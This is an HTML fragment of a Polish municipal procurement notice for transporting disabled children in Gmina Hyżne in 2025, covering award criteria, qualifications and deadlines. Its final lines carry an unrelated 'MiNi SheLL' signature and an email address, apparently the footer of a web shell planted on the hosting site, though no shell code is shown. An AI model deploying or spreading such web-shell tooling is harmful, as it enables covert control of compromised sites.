żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część nr 2: Dowóz dzieci niepełnosprawnych z terenu Gminy Hyżne w roku 2025 w obie strony w kierunku Wysokiej.<br/>2.1	Przedmiotem zamówienia jest bezpieczny i punktualny dowóz 3 dzieci niepełnosprawnych z terenu Gminy Hyżne do Niepublicznego Ośrodka Rewalidacyjno-Wychowawczego Caritas w Wysokiej, Wysoka 47. Przewóz dotyczy wszystkich dni, <br/>w których odbywać się będą zajęcia dydaktyczne, opiekuńcze i wychowawcze zgodnie <br/>z harmonogramem zajęć jaki obowiązuje w Ośrodku w 2025 roku. Maksymalna długość trasy w obie strony stanowi do 50 km +/- 5 km i uzależniona jest od frekwencji uczniów/dzieci w zajęciach w Ośrodku. Przewidywana liczba dni dowozu to około – 199 dni. <br/>Wykonawca zobowiązany będzie do zapewnienia kierowcy oraz opiekuna dla dzieci w czasie dowozu i w drodze powrotnej oraz zachowania szczególnego bezpieczeństwa w czasie przewozu na trasach: <br/>Trasa I: <br/>Brzezówka - Hyżne – Niepubliczny Ośrodek Rewalidacyjno-Wychowawczy Caritas w Wysokiej, <br/>Trasa II: <br/>Niepubliczny Ośrodek Rewalidacyjno-Wychowawczy Caritas w Wysokiej – Hyżne - Brzezówka <br/> <br/>2.2 Wymagania dotyczące sposobu realizacji przedmiotu zamówienia: <br/>a)	dowóz 3 dzieci wraz z opiekunem codziennie od poniedziałku do piątku (w dniach nauki w Ośrodku) począwszy od 02.01.2025r. do 31.12.2025r. <br/>b)	W trakcie trwania ferii, świąt lub innych dni wyznaczonych przez dyrektora Ośrodka jako wolne od zajęć przewozy nie będą się odbywały. <br/>2.3 Rano dzieci będą zabierane z miejsca zamieszkania i po zakończonych zajęciach w Ośrodku odwożone do miejsca zamieszkania. <br/>2.4	Godziny dowozu i przywozu dzieci uzależnione będą od rozkładów zajęć w Ośrodku. Szczegółowe godziny przewozu dzieci (umożliwiające dotarcie na wyznaczony czas) zostaną ustalone przez Wykonawcę przy udziale Zamawiającego oraz rodziców dzieci dowożonych.<br/>2.5	Wykonawca podczas świadczenia każdego przewozu zobowiązany jest zapewnić dzieciom dodatkowo poza kierowcą opiekuna. <br/> <br/>Wymagania dotyczące opiekuna: <br/>Funkcję opiekuna może sprawować wyłącznie osoba pełnoletnia, mająca pełną zdolność do czynności prawnych. Osoba pełniąca funkcję opiekuna będzie zobowiązana w szczególności do: <br/>	zapewnienia bezpieczeństwa w trakcie przewozu dzieci, <br/>	zapewnienia bezpiecznego wsiadania do pojazdu oraz wysiadania z pojazdu dzieci niepełnosprawnych, <br/>	doprowadzenia i przyprowadzenia z samochodu do ośrodka każdego dziecka. <br/>W trakcie realizacji usługi oraz w przypadku indywidualnych zmian zajęć w Ośrodku Wykonawca zobowiązany będzie kontaktować się z rodzicami i wychowawcami placówki. <br/>2.6 Dzieci dowożone mają wystarczającą sprawność ruchową, aby korzystać ze zwykłych siedzeń pojazdu. Zamawiający w obecnej chwili nie posiada zgłoszeń od rodziców dotyczących przewozu osób na wózkach inwalidzkich itp. <br/>2.7 W ramach umowy Wykonawca zobowiązany będzie do: <br/>1)	dowożenia i odwożenia dzieci z zachowaniem zasady, że dzieci dowożone są do Ośrodka nie później niż na 10 minut przed rozpoczęciem zajęć, <br/>2)	przewozu dzieci środkiem transportu spełniającym normy do przewozu osób niepełnosprawnych, pojazdy muszą być wyposażone w pasy bezpieczeństwa, <br/>3)	podstawienia niezwłocznie samochodu spełniającego właściwe wymagania techniczne <br/>w ruchu drogowym w przypadku awarii wyznaczonego samochodu, nie później jednak niż w ciągu 60 minut od powstania awarii, <br/>4)	pokrycia dodatkowych kosztów przewozu, wynikłych z wykonania usługi przez podmiot zastępczy wybrany przez Zamawiającego, w przypadku niemożności zrealizowania przewozu przez Wykonawcę, <br/>5)	posiadania ważnej polisy ubezpieczeniowej OC, NNW w okresie realizacji zlecenia, <br/>6)	zapewnienia przewożonym dzieciom niepełnosprawnym opieki podczas dowozu, bezpiecznych i higienicznych warunków przejazdu oraz pomocy w przemieszczaniu się, <br/>7)	zapewnienia bezpieczeństwa osób i mienia podczas wykonywania usługi. <br/>Zamawiający nie bierze żadnej odpowiedzialności za wypadki i zdarzenia jakiegokolwiek typu, w wyniku, których nastąpi uszkodzenie ciała, śmierć czy szkoda materialna spowodowana działalnością Wykonawcy. <br/> <br/>UWAGA <br/>Zaleca się dokonanie wizji lokalnej w terenie, którego dotyczy przedmiot zamówienia przed złożeniem oferty, w celu prawidłowej oceny wartości wykonania przedmiotu umowy na własny koszt. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">60130000-8 - Usługi w zakresie specjalistycznego transportu drogowego osób</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Kryteria oceny ofert - Zamawiający uzna oferty za spełniające wymagania i przyjmie do szczegółowego rozpatrywania, jeżeli: <br/>1.1.	oferta, spełnia wymagania określone niniejszą specyfikacją, <br/>1.2.	oferta została złożona, w określonym przez Zamawiającego terminie, <br/>1.3.	Wykonawca przedstawił ofertę zgodną co do treści z wymaganiami Zamawiającego. <br/> <br/>2.	Kryteria oceny ofert - stosowanie matematycznych obliczeń przy ocenie ofert, stanowi podstawową zasadę oceny ofert, które oceniane będą w odniesieniu do najkorzystniejszych warunków przedstawionych przez Wykonawców w zakresie każdego kryterium. <br/>3.	Za parametry najkorzystniejsze w danym kryterium, oferta otrzyma maksymalną ilość punktów ustaloną w poniższym opisie, pozostałe będą oceniane odpowiednio - proporcjonalnie do parametru najkorzystniejszego, wybór oferty dokonany zostanie na podstawie opisanych kryteriów i ustaloną punktację: punktacja 0-100 (100%=100pkt). <br/>4.	Wybór oferty zostanie dokonany w oparciu o przyjęte w niniejszym postępowaniu kryteria oceny ofert przedstawione poniżej. <br/><br/>Lp. Nazwa kryterium Waga kryterium Szczegółowy opis, wzór Uwagi, objaśnienia <br/>1 cena 60 C = (C min/C o) x 60 C min- najniższa cena brutto z ocenianych ofert (zł) <br/>C o - cena brutto określona w <br/>ocenianej ofercie (zł) <br/>2 termin płatności 40 T = ((To - Tmin) / <br/>(Tmax - Tmin)) x 40 T o - termin płatności <br/>zadeklarowany w ofercie ocenianej <br/>T min. - termin płatności minimalny <br/>T max - termin płatności maksymalny <br/> <br/>5.	Dodatkowe postanowienia dot. kryterium cena: <br/>Punkty w tym kryterium zostaną przyznane według wzoru: <br/> <br/>C = (C min/C o) x 60 pkt <br/>gdzie: <br/>C min- najniższa cena brutto z ocenianych ofert (zł) <br/>C o - cena brutto określona w ocenianej ofercie (zł) <br/> <br/>6.	Dodatkowe postanowienia dot. kryterium termin płatności: <br/>Liczba punktów w kryterium termin płatności zostanie przyznany w oparciu o zadeklarowany przez Wykonawcę termin płatności. Wykonawca może zadeklarować termin płatności <br/>w następującym przedziale dni: <br/>Termin płatności minimalny – 7 dni <br/>Termin płatności maksymalny – 30 dni <br/>Termin płatności należy zadeklarować w dniach <br/> <br/>Sposób przyznawania punktów: <br/>1)	Wykonawca, który zaoferuje maksymalny termin płatności otrzyma maksymalną liczbę punktów w niniejszym kryterium, <br/>2)	Wykonawca, który zaoferuje minimalny termin płatności - otrzyma 0 pkt w niniejszym kryterium, <br/>3)	W przypadku, gdy wszyscy Wykonawcy zaproponują jednakowy termin realizacji, wszyscy otrzymują jednakową liczbę punktów w niniejszym kryterium. <br/>4)	Pozostali, czyli Wykonawcy, którzy zaoferują wartość pośrednią, pomiędzy terminem minimalnym a maksymalnym, otrzymują liczbę punktów obliczoną wg wzoru: <br/> <br/>T = ((To - Tmin) / (Tmax - Tmin)) x 40 pkt. <br/>gdzie: <br/>T o - termin płatności zadeklarowany w ofercie ocenianej <br/>T min. – termin płatności minimalny <br/>T max – termin płatności maksymalny <br/> <br/>7.	Oferta wypełniająca w najwyższym stopniu wymagania określone w każdym kryterium otrzyma maksymalną liczbę punktów. Pozostałym Wykonawcom, wypełniającym wymagania kryterialne przypisana zostanie odpowiednio mniejsza (proporcjonalnie mniejsza) liczba punktów. Wynik będzie traktowany jako wartość punktowa oferty. <br/>8.	Wynik - oferta, która przedstawia najkorzystniejszy bilans (maksymalna liczba przyznanych punktów w oparciu o ustalone kryteria) zostanie oceniona jako najkorzystniejszą, pozostałe oferty zostaną sklasyfikowane zgodnie z ilością uzyskanych punktów. <br/>9.	Wykonawca, którego oferta zostanie oceniona jako najkorzystniejszą podlegać będzie badaniu czy nie podlega wykluczeniu oraz spełnia warunki udziału w postępowaniu, zgodnie z pkt. V.5. niniejszej Specyfikacji .</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">termin płatności</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1) odpowiedniego zezwolenia, licencji, koncesji lub potwierdzenia wpisu do rejestru działalności regulowanej, jeżeli ich posiadanie jest niezbędne do świadczenia określonych usług w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, <br/>Działalność prowadzona na potrzeby wykonania przedmiotu zamówienia wymaga posiadania zezwolenie na wykonywanie zawodu przewoźnika drogowego przewidziane przepisami ustawy o transporcie drogowym lub ważną licencję na wykonywanie krajowego transportu drogowego osób, wydaną na podstawie wcześniej obowiązujących przepisów. <br/>Część nr 1 <br/>1) wykaz osób, skierowanych przez Wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za kierowanie pojazdem i opieką nad dziećmi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami. <br/>Warunek zostanie spełniony, jeśli Wykonawca wykaże, że dysponuje osobami zdolnymi do wykonania zamówienia w tym: <br/>a)	kierowca w liczbie nie mniejszej niż liczba pojazdów tj. min. 2 kierowców posiadających uprawnienia zawodowe wynikające z ustawy o transporcie drogowym oraz informację, że nie figurują w Rejestrze Sprawców Przestępstw na Tle Seksualnym, <br/>b)	osoba - min. 1 opiekun – posiadająca przeszkolenie w zakresie udzielania pierwszej pomocy przedmedycznej oraz informację, że nie figuruje w Rejestrze Sprawców Przestępstw na Tle Seksualnym, <br/>2) wykaz narzędzi, wyposażenia zakładu lub urządzeń technicznych dostępnych Wykonawcy w celu wykonania zamówienia publicznego wraz z informacją o podstawie do dysponowania tymi zasobami. <br/>Warunek zostanie spełniony, jeśli Wykonawca wykaże, że dysponuje min. 2 pojazdami samochodowymi przystosowanymi do przewozu osób niepełnosprawnych, oznakowanym. <br/> <br/>Część nr 2 <br/>1) wykaz osób, skierowanych przez Wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za kierowanie pojazdem i opieką nad dziećmi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia <br/>i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami. <br/>Warunek zostanie spełniony, jeśli Wykonawca wykaże, że dysponuje osobami zdolnymi <br/>do wykonania zamówienia w tym: <br/>a)	kierowca w liczbie nie mniejszej niż liczba pojazdów tj. min. 2 kierowców posiadających uprawnienia zawodowe wynikające z ustawy o transporcie drogowym oraz informację, że nie figurują w Rejestrze Sprawców Przestępstw na Tle Seksualnym, <br/>b)	osoba - min. 1 opiekun - posiadająca przeszkolenie w zakresie udzielania pierwszej pomocy przedmedycznej oraz informację, że nie figuruje w Rejestrze Sprawców Przestępstw na Tle Seksualnym. <br/>2) wykaz narzędzi, wyposażenia zakładu lub urządzeń technicznych dostępnych Wykonawcy w celu wykonania zamówienia publicznego wraz z informacją o podstawie do dysponowania tymi zasobami, <br/>Warunek zostanie spełniony, jeśli Wykonawca wykaże, że dysponuje min. 2 pojazdami samochodowymi przystosowanymi do przewozu osób niepełnosprawnych, oznakowany. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1) odpowiedniego zezwolenia, licencji, koncesji lub potwierdzenia wpisu do rejestru działalności regulowanej, jeżeli ich posiadanie jest niezbędne do świadczenia określonych usług w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, <br/>Działalność prowadzona na potrzeby wykonania przedmiotu zamówienia wymaga posiadania zezwolenie na wykonywanie zawodu przewoźnika drogowego przewidziane przepisami ustawy o transporcie drogowym lub ważną licencję na wykonywanie krajowego transportu drogowego osób, wydaną na podstawie wcześniej obowiązujących przepisów. <br/>Część nr 1 <br/>1) wykaz osób, skierowanych przez Wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za kierowanie pojazdem i opieką nad dziećmi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami. <br/>Warunek zostanie spełniony, jeśli Wykonawca wykaże, że dysponuje osobami zdolnymi do wykonania zamówienia w tym: <br/>a)	kierowca w liczbie nie mniejszej niż liczba pojazdów tj. min. 2 kierowców posiadających uprawnienia zawodowe wynikające z ustawy o transporcie drogowym oraz informację, że nie figurują w Rejestrze Sprawców Przestępstw na Tle Seksualnym, <br/>b)	osoba - min. 1 opiekun – posiadająca przeszkolenie w zakresie udzielania pierwszej pomocy przedmedycznej oraz informację, że nie figuruje w Rejestrze Sprawców Przestępstw na Tle Seksualnym, <br/>2) wykaz narzędzi, wyposażenia zakładu lub urządzeń technicznych dostępnych Wykonawcy w celu wykonania zamówienia publicznego wraz z informacją o podstawie do dysponowania tymi zasobami. <br/>Warunek zostanie spełniony, jeśli Wykonawca wykaże, że dysponuje min. 2 pojazdami samochodowymi przystosowanymi do przewozu osób niepełnosprawnych, oznakowanym. <br/> <br/>Część nr 2 <br/>1) wykaz osób, skierowanych przez Wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za kierowanie pojazdem i opieką nad dziećmi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia <br/>i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami. <br/>Warunek zostanie spełniony, jeśli Wykonawca wykaże, że dysponuje osobami zdolnymi <br/>do wykonania zamówienia w tym: <br/>a)	kierowca w liczbie nie mniejszej niż liczba pojazdów tj. min. 2 kierowców posiadających uprawnienia zawodowe wynikające z ustawy o transporcie drogowym oraz informację, że nie figurują w Rejestrze Sprawców Przestępstw na Tle Seksualnym, <br/>b)	osoba - min. 1 opiekun - posiadająca przeszkolenie w zakresie udzielania pierwszej pomocy przedmedycznej oraz informację, że nie figuruje w Rejestrze Sprawców Przestępstw na Tle Seksualnym. <br/>2) wykaz narzędzi, wyposażenia zakładu lub urządzeń technicznych dostępnych Wykonawcy w celu wykonania zamówienia publicznego wraz z informacją o podstawie do dysponowania tymi zasobami, <br/>Warunek zostanie spełniony, jeśli Wykonawca wykaże, że dysponuje min. 2 pojazdami samochodowymi przystosowanymi do przewozu osób niepełnosprawnych, oznakowany.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1) Podmiotowe środki dowodowe wymienione w pkt. od VII.3 do VII.4 nie są dołączane do oferty. Zamawiający przed wyborem<br/>najkorzystniejszej oferty wzywa Wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie<br/>krótszym niż 5 dni, aktualnych na dzień złożenia podmiotowych środków dowodowych.<br/>2) Jeżeli jest to niezbędne do zapewnienia odpowiedniego przebiegu postępowania o udzielenie zamówienia, Zamawiający może na<br/>każdym etapie postępowania wezwać Wykonawców do złożenia wszystkich lub niektórych podmiotowych środków dowodowych<br/>aktualnych na dzień ich złożenia.<br/>3) Jeżeli zachodzą uzasadnione podstawy do uznania, że złożone uprzednio podmiotowe środki dowodowe nie są już aktualne,<br/>Zamawiający może w każdym czasie wezwać Wykonawcę lub Wykonawców do złożenia wszystkich lub niektórych podmiotowych<br/>środków dowodowych aktualnych na dzień ich złożenia.<br/>4) Zamawiający nie wzywa do złożenia podmiotowych środków dowodowych w sytuacjach określonych w art. 274 ust. 4 ustawy Pzp.<br/>5) W sytuacjach określonych w art. 128 ustawy Pzp Zamawiający może wezwać do złożenia, poprawienia lub uzupełnienia w<br/>wyznaczonym terminie:<br/>- oświadczenia Wykonawcy,<br/>- podmiotowych środków dowodowych,<br/>- innych dokumentów lub oświadczeń składanych w postępowaniu,<br/>jeżeli są one niekompletne lub zawierają błędy.<br/>6) Zamawiający może żądać od Wykonawców wyjaśnień dotyczących treści oświadczenia Wykonawcy lub złożonych podmiotowych<br/>środków dowodowych lub innych dokumentów lub oświadczeń składanych w postępowaniu.</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1) Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia.<br/>2) Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do<br/>reprezentowania w postępowaniu i zawarcia umowy, a pełnomocnictwo / upoważnienie do pełnienia takiej funkcji<br/>wystawione zgodnie z wymogami ustawowymi, podpisane przez prawnie upoważnionych przedstawicieli każdego z<br/>Wykonawców występujących wspólnie należy załączyć do oferty.<br/>3) Oferta winna być podpisana przez każdego z Wykonawców występujących wspólnie lub przez upoważnionego<br/>przedstawiciela.<br/>4) Wykonawcy wspólnie ubiegający się o udzielenie zamówienia ponoszą solidarną odpowiedzialność za wykonanie<br/>umowy.<br/>5) Jeżeli oferta wspólna złożona przez dwóch lub więcej Wykonawców zostanie wyłoniona w prowadzonym postępowaniu<br/>jako najkorzystniejsza przed podpisaniem umowy Zamawiający zażąda w wyznaczonym terminie złożenia umowy<br/>regulującej współpracę tych Wykonawców, podpisanej przez wszystkich Wykonawców, przy czym termin, na jaki została<br/>zawarta nie może być krótszy niż termin realizacji zamówienia.<br/>6) Wykonawców obowiązują postanowienia pkt. VII &#34;Wykaz oświadczeń lub dokumentów, potwierdzających spełnianie<br/>warunków udziału w postępowaniu oraz brak podstaw wykluczenia w sprawie dokumentów wymaganych w przypadku<br/>składania oferty wspólnej. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> zgodnie z załącznikiem nr 3.1 - projekt umowy<br/>zgodnie z załącznikiem nr 3. - projekt umowy <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-11-29 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://pzp.hyzne.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-11-29 10:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com